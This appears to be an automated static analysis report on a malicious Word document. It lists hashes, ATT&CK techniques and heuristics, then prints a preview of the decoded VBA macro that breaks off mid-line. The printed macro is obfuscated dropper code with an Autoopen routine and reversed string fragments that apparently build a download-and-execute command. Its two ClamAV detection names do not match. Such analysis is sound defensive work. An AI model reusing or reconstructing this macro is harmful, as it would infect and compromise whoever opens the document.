Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 781c958e522ee47e…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 130.5 KB
Created: 2018-05-02 14:10:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 4db375da7ec7d8c4ccfced0ff410ebff
SHA-1: 1470f8d195993adb8458c14cc84ce8b7904c2bb8
SHA-256: 781c958e522ee47e9a2014c74641c89dc4bae593fcc43cd5ca461cf1896f0fa3
Risk score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA code, which is commonly used to download and execute secondary payloads. The 'Autoopen' macro marker suggests automatic execution upon opening. The ClamAV detection name 'Doc.Dropper.Agent-6527696-0' further supports its nature as a dropper.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6527591-0 [critical; CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Agent-6527591-0
  • VBA macros detected [medium; OLE_VBA_MACROS; 2 related findings]
    Document contains VBA macro code
  • Shell() call in VBA [critical; OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro [high; OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium; OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info; EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 121912 bytes
SHA-256: 4dcf03147eb000eba460dfc3aae067aa176f119d116dcbb9f447e9b228efec05

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "rzAFDBQs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub aujzGD(JlCZC)
Rqvjlz = 53564 * CByte(miJDlj)
            zjrpOw = Int(44359) - Oct(11422 - 42224 * uMmYo)
            BuIQQ = 15088 * CByte(DRUMo)
End Sub
Sub avVXY(CKjok)
kZcrlp = 17927 * CByte(XHJcQR)
            KnYuki = Int(80774) - Oct(91575 - 15361 * pOMmw)
            GYWfi = 92485 * CByte(jfDqs)
msHGX = 83346 * CByte(LuALu)
            URwawL = Int(50973) - Oct(78533 - 6064 * tlGOa)
            OjszcV = 63984 * CByte(IpvYHL)
LlEbv = 68774 * CByte(GfSij)
            NUQczT = Int(60615) - Oct(37296 - 36209 * BzkORH)
            Bhrfi = 173 * CByte(nfIJa)
End Sub
Sub iwlsU(ZSbojF)
oDcLVn = 98112 * CByte(QwsIf)
            OpSKW = Int(86391) - Oct(11415 - 35480 * Nrtdi)
            atKapL = 97059 * CByte(TmWbz)
BtkoT = 21783 * CByte(JdKMmW)
            OUbJR = Int(35869) - Oct(82068 - 6647 * ipIPiw)
            zRIEA = 39672 * CByte(EJWTQ)
End Sub
Sub Autoopen()
On Error Resume Next
AOCpz = 93180 * CByte(LMKiXw)
            CwKvz = Int(22062) - Oct(10404 - 20367 * dRAtNW)
            uzanhT = 75009 * CByte(ShwMn)
DXjkSYi (ihCJE + LIjSwjVROtzdG + zaUEK)
TZXzCm = 77498 * CByte(QfzKi)
            LrdRNs = Int(45152) - Oct(76162 - 99161 * wkIQAT)
            VdrzNv = 40697 * CByte(LYaqwk)
End Sub
Sub iWuHzC(RSjZnw)
iXMwA = 53403 * CByte(niwvIm)
            TzwAA = Int(12523) - Oct(12243 - 72987 * sWbdL)
            ToIWN = 64180 * CByte(NuwIK)
nvLoQq = 96273 * CByte(jYmsL)
            ATaYwV = Int(28138) - Oct(28985 - 18877 * mYUSkC)
            swPwa = 63855 * CByte(LnNDkP)
dCoAt = 37986 * CByte(KocYm)
            CrWfk = Int(63773) - Oct(42765 - 89784 * wuZmtN)
            IKfuR = 16124 * CByte(fSqid)
End Sub
Sub ImZoIi(QhSCt)
hGuaHa = 23002 * CByte(fRtrGu)
            rNuwt = Int(24214) - Oct(76763 - 17991 * ldOtu)
            scBqaQ = 69600 * CByte(iIRjcV)
End Sub

Attribute VB_Name = "wBkwZUYEAOt"
Sub apdMRE(ZRqQT)
HVMqb = 56206 * CByte(ooobi)
            VFTXBc = Int(63025) - Oct(37858 - 18983 * EwzfX)
            OGlQtS = 98195 * CByte(NYliI)
End Sub
Function LIjSwjVROtzdG()
On Error Resume Next
isaHdb = 46833 * CByte(vOHYWd)
            shLwb = Int(18442) - Oct(29599 - 25231 * qRwfZ)
            SozkK = 22176 * CByte(wrIAU)
bPwwNM = MBuHnU("N6X4rRahC[(EcAlPEr-63]J8Dl", 41506 - 41506 + 5 + 41506 - 41506, 41506 - 41506 + 17 + 41506 - 41506)
qppUOz = 19908 * CByte(sfsZTi)
            RLdtW = Int(47838) - Oct(93302 - 37038 * lTsjk)
            nbpjX = 65077 * CByte(zkfPk)
SuHvi = 69597 * CByte(tRiJiA)
            oWEUs = Int(58884) - Oct(98526 - 46925 * ipYUbz)
            GwpGXi = 56410 * CByte(Thshmu)
MSHfwYop = MBuHnU("uo9jQclbup'+':'+'vn'+'eNYX '+'= CDS'+'NYX;'+')h'+'EZ@hEZ'+'(tilpS.hEZ'+'/32'+'Xrtx'+'K/ed'+'.sno'+'itaerc'+'43", 49469 - 49469 + 2 + 49469 - 49469, 49469 - 49469 + 103 + 49469 - 49469)
kQkFVS = 3328 * CByte(RItGZ)
            JPUuR = Int(44655) - Oct(21527 - 78732 * fJsPBK)
            RlsDEH = 69699 * CByte(ihFiY)
IQSNs = 85940 * CByte(sQzZNG)
            MXqja = Int(12028) - Oct(27 - 69845 * oGfPz)
            KcOOIz = 8766 * CByte(tdRwpq)
Uruqr = MBuHnU("a3zr8hC[+221]RahC[( ecALperC- 93]RahC[,'hEZ' EcAlPEr- )'}}'+'{hcta'+'c};'+'ka'+'erb;)'+'CDS'+'N'1Es", 94931 - 94931 + 4 + 94931 - 94931, 94931 - 94931 + 91 + 94931 - 94931)
zJdsaI = 69498 * CByte(khVXI)
            GMcoOG = Int(44965) - Oct(21933 - 98510 * PHwzCJ)
            KtVoz = 3746 * CByte(XUaFd)
iGWZVh = 80431 * CByte(oKLls)
            fIjvEr = Int(61814) - Oct(58565 - 72084 * FDJtu)
            IwvLDv = 74779 * CByte(YbRIS)
HrkXQ = MBuHnU("qN5A ))43]RahC[,)94]RahC[+211]RahC[+17]RahC[(EcAlPEr-29]RahC[,)901]RahC[+94]RahC[+89]RqW%", 64385 - 64385 + 5 + 64385 - 64385, 64385 - 64385 + 81 + 64385 - 64385)
fuNRa = 70207 * CByte(qCVwDV)
            USXwa = Int(80679) - Oct(3980 - 24
... (truncated)